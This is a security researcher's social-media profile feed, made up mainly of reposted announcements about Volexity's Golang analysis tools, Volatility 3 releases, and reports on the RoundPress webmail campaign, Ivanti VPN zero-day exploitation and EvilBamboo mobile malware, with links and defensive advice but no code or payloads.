tlansec 

@[email protected]
132 Followers
70 Following
38 Posts
Threats n stuff.
tlansec Aug 12, 2025
Volexity Aug 11, 2025

@volexity has released updates to its #opensource GoResolver project and other #golang tools! This work was part of a project for one of our #summerinternship students. Read more details about this project in our special blog post: https://www.volexity.com/blog/2025/08/11/go-get-em-updates-to-volexity-golang-tooling/

We are proud to contribute to the open source community + work alongside students in our annual #internship program! If you would like to learn more about internships at Volexity, check out our program details here: https://www.volexity.com/internships/

#threatintel #malwareanalysis

Go Get 'Em: Updates to Volexity Golang Tooling

Volexity’s GoResolver tool was released in April 2025 to help with analysis of these samples, reducing analyst load when working with obfuscated Golang binaries. However, there are still some difficulties when working with Golang samples, even in the absence of obfuscation. Challenges include organization of string information and propagation of runtime type information. To ease these challenges Volexity has released a new utility, GoStringExtractor, and added functionality to the existing GoResolver tool.

Volexity
tlansec May 16, 2025
ESET ResearchMay 15, 2025
#ESETresearch publishes its investigation of Operation RoundPress, which uses XSS vulnerabilities to target high-value webmail servers. We attribute the operation to Sednit with medium confidence. https://www.welivesecurity.com/en/eset-research/operation-roundpress/
In 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other webmail software including Horde, MDaemon, and Zimbra.. For MDaemon, Sednit exploited the zero-day XSS vulnerability CVE-2024-11182.
Most victims were governmental entities and defense companies in Eastern Europe, although we have observed governments in Africa, Europe, and South America being targeted as well.
Our blogpost provides an analysis of the JavaScript payloads, which we named SpyPress. They are able to steal webmail credentials, and exfiltrate contacts and email messages from the victim’s mailbox. IoCs available in our GitHub repo: https://github.com/eset/malware-ioc/tree/master/operation_roundpress 5/5
Operation RoundPress targeting high-value webmail servers

ESET researchers uncover a Russia-aligned espionage operation that they named RoundPress and that targets webmail servers via XSS vulnerabilities.

tlansec May 16, 2025
volatilityMay 16, 2025
We are very excited to announce that Volatility 3 has reached parity with Volatility 2! With this achievement, Volatility 2 is now deprecated. See the full details in our blog post: https://volatilityfoundation.org/announcing-the-official-parity-release-of-volatility-3/
Announcing the Official Parity Release of Volatility 3!

Visit the post for more.

The Volatility Foundation - Promoting Accessible Memory Analysis Tools Within the Memory Forensics Community
tlansec Apr 1, 2025
Volexity Apr 1, 2025
In the course of its investigations, @volexity frequently encounters malware samples written in Golang. This reflects the increase in popularity of the Golang generally, and presents challenges to reverse engineering tools.
 
Today, @volexity is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. @r00tbsd & Killian Raimbaud presented details at INCYBER Forum earlier today.
 
GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!
 
Check out the blog post on how GoResolver works and where to download it: https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/
 
#dfir #reversing #malwareanalysis
GoResolver: Using Control-flow Graph Similarity to Deobfuscate Golang Binaries, Automatically

In the course of its investigations, Volexity frequently encounters malware samples written in Golang. Binaries written in Golang are often challenging to analyze because of the embedded libraries and the sheer size of the resulting binaries. This issue is amplified when samples are obfuscated using tools such as Garble, an open-source Golang obfuscation tool.The popularity of Golang amongst malware developers, and the use of obfuscators to make reverse-engineering harder, raised the need for better tooling to assist in reverse-engineering efforts. Volexity developed GoResolver, an open-source tool...

Volexity
tlansec Feb 2, 2024
Volexity Feb 1, 2024

In this blog post, Michael Hale Ligh & Andrew Case (@attrc) break down how @volexity used #memoryforensics to discover two #0days being chained together to achieve unauthenticated remote code execution in Ivanti Connect Secure VPN devices. More details here: https://www.volexity.com/blog/2024/02/01/how-memory-forensics-revealed-exploitation-of-ivanti-connect-secure-vpn-zero-day-vulnerabilities

#dfir #threatintel

tlansec Jan 16, 2024
Paul RascagneresJan 16, 2024

Last week, we shared details concerning a threat actor (UTA0178) exploiting #Ivanti Connect Secure 0-days. Initially few devices were compromised. Since Thursday the exploitation goes global. We identified over 1700 compromised appliances in the world.

All the sectors are concerned: small and big organizations. Private and public sectors. If you haven't already done, apply the mitigation provided by the vendor. Run the integrity checker tool to check if you have any mismatches... More details: https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/

#threatintel #threatintelligence

Ivanti Connect Secure VPN Exploitation Goes Global

On January 10, 2024, Volexity publicly shared details of targeted attacks by UTA00178 exploiting two zero-day vulnerabilities (CVE-2024-21887 and CVE-2023-46805) in Ivanti Connect Secure (ICS) VPN appliances. On the same day, Ivanti published a mitigation that could be applied to ICS VPN appliances to prevent exploitation of these vulnerabilities. Since publication of these details, Volexity has continued to monitor its existing customers for exploitation. Volexity has also been contacted by multiple organizations that saw signs of compromise by way of mismatched file detections. Volexity has been actively working multiple new cases of organizations with compromised ICS VPN appliances.

Volexity
tlansec Jan 12, 2024
Paul RascagneresJan 11, 2024

End of last year we worked on an incident response where a TA exploited 2 0-days to compromised Ivanti Connect Secure (previously Pulse Connect Secure).

The first vulnerability (CVE-2023-46805) was abused to bypass the authentication. The second vulnerability (CVE-2024-21887) was used to execute commands on the device.

The TA remount the filesystem to enable the write permissions. Then, the attackers modified an existing JavaScript and deployed two webshells.

They modified lastauthserverused.js, a script that is legitimately used in the logon page. The modification exfiltrates the username and the password. The two webshells use the HTTP request parameters to execute code.

Takeovers: monitor your network (outbound connections via curl was perfected on multiple occasion), check your logs (store your logs outside of the appliance via syslog), use the in-build integrity checker tool.
More details & IOCs in our blog post: https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

#Threatintel #Threatintelligence #Ivanti

Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN

Volexity has uncovered active in-the-wild exploitation of two vulnerabilities allowing unauthenticated remote code execution in Ivanti Connect Secure VPN appliances. An official security advisory and knowledge base article have been released by Ivanti that includes mitigation that should be applied immediately. However, a mitigation does not remedy a past or ongoing compromise. Systems should simultaneously be thoroughly analyzed per details in this post to look for signs of a breach.

Volexity
tlansec Oct 11, 2023
volatilityOct 2, 2023

@volatility New Release: #volatility3 v2.5.0 - visit https://github.com/volatilityfoundation/volatility3/releases for details and downloads.

#memoryforensics #dfir

Releases · volatilityfoundation/volatility3

Volatility 3.0 development. Contribute to volatilityfoundation/volatility3 development by creating an account on GitHub.

GitHub
tlansec Oct 5, 2023
Volexity Oct 4, 2023
Don't miss @tlansec's talk at 12:00 BST tomorrow, Oct 5, at #VB2023 in London! He will share @volexity's research and observations of a North Korean #apt using unique, persistent #socialengineering techniques to target victims. More here: https://www.virusbulletin.com/conference/vb2023/abstracts/sharptongue-pwning-your-foreign-policy-one-interview-request-time/ #threatintel #dfir
Virus Bulletin :: SharpTongue: pwning your foreign policy, one interview request at a time

VB2023 paper: SharpTongue: pwning your foreign policy, one interview request at a time

tlansec Sep 25, 2023

ICYMI, on Friday our team @volexity put out a report on APT activity targeting mobile devices (Android and likely iOS). The attackers distributed the malware by creating purpose-built websites, online communities and fake personas to assist in distribution.

https://www.volexity.com/blog/2023/09/22/evilbamboo-targets-mobile-devices-in-multi-year-campaign/

EvilBamboo Targets Mobile Devices in Multi-year Campaign

Volexity has identified several long-running and currently active campaigns undertaken by the threat actor Volexity tracks as EvilBamboo (formerly named Evil Eye) targeting Tibetan, Uyghur, and Taiwanese individuals and organizations. These targets represent three of the Five Poisonous Groups of Chinese Communist Party (CCP).

Volexity